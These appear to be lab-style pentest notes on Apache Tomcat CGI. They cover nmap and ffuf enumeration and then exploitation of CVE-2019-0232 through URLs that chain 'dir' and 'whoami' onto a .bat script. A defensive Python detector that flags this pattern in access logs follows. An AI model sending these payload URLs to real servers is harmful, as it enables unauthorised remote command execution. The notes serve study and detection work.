Tomcat CGI
Enumeration
Using NMAP
$ nmap -p- -sC -Pn 10.129.204.227 --open
8080/tcp open http-proxy
|_http-title: Apache Tomcat/9.0.17
|_http-favicon: Apache Tomcat
Fuzzing for .cmd and .bat scripts under /cgi/
$ ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd
$ ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat
Exploitation
CVE-2019-0232
Assuming we found welcome.bat, the following request runs dir: http://10.129.204.227:8080/cgi/welcome.bat?&dir
If the PATH variable is unset, call the binary by its full path, e.g. to run whoami:
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe
Use the set command on Windows to view the PATH variable.
Notes
Important Vulnerabilities
CVE-2019-0232 (version 9.0.0.M1 <= 9.0.17, 8.5.0 <= 8.5.39, and 7.0.0 <= 7.0.93)
Remote Code Execution on Windows systems if enableCmdLineArguments is enabled.
PoC:
http://example.com/cgi-bin/hello.bat?&dir
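From the defender's side, the PoC shape above (a .bat/.cmd CGI script with a query string that is passed to cmd.exe as arguments and begins with &) is easy to spot in Tomcat access logs. The following detector is an added example, not part of the original notes; the log lines it scans are constructed samples, and the /cgi and /cgi-bin paths are assumed CGI servlet mappings.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2019:10:11:12 +0000] "GET /cgi/welcome.bat HTTP/1.1" 200 512
10.0.0.5 - - [12/May/2019:10:11:20 +0000] "GET /cgi/welcome.bat?name=bob HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2019:10:12:01 +0000] "GET /cgi/welcome.bat?&dir HTTP/1.1" 200 2048
10.0.0.9 - - [12/May/2019:10:12:30 +0000] "GET /cgi/welcome.bat?%26c:%5Cwindows%5Csystem32%5Cwhoami.exe HTTP/1.1" 200 64
10.0.0.7 - - [12/May/2019:10:13:00 +0000] "GET /docs/index.html HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Script types the Tomcat CGI servlet executes via cmd.exe on Windows
CGI_SCRIPT_RE = re.compile(r'/cgi(?:-bin)?/[^/?]+\.(?:bat|cmd)$', re.IGNORECASE)


def is_cgi_arg_injection(target: str) -> bool:
    """True if the request hits a .bat/.cmd CGI script with a query string that
    Tomcat would pass as command-line arguments (no unencoded '=') and that,
    once URL-decoded, contains '&', the cmd.exe command separator used by the
    CVE-2019-0232 PoC."""
    path, sep, query = target.partition('?')
    if not sep or not CGI_SCRIPT_RE.search(path):
        return False
    if '=' in query:          # key=value form: not treated as cmd-line args
        return False
    return '&' in unquote(query)


def scan_access_log(text: str) -> list[dict]:
    """Return one finding per suspicious request line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cgi_arg_injection(m['target']):
            findings.append({'ip': m['ip'], 'ts': m['ts'],
                             'target': unquote(m['target']),
                             'status': int(m['status'])})
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['target']} ({f['status']})")
```

A 200 status on a flagged line is the strongest signal, since a patched or correctly configured server (enableCmdLineArguments false, the default from 9.0.18 onward) will not have executed the chained command.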